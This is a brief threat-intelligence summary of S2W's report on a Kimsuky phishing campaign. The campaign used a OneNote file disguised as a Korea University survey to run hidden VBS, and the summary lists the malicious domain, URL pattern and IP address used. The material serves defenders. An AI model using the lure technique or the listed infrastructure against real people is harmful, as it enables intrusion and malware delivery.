S2W reported that Kimsuky was distributing malware with a malicious Microsoft OneNote file, a delivery technique more commonly seen in cybercrime campaigns. The lure impersonated Korea University’s Institute for Peace and Democracy and asked survey participants to open what appeared to be a privacy-agreement HWP file for recompense, but clicking the embedded object executed hidden VBS. The script attempted to download a decoy HWP and additional code from delps.scienceontheweb.net, using a list.php?query=1 URL pattern and hosting infrastructure previously associated with Kimsuky Babyshark activity. The final payload was not recovered, but the recompense theme, URL format, and 185.176.43[.]98 infrastructure supported the report’s Kimsuky attribution.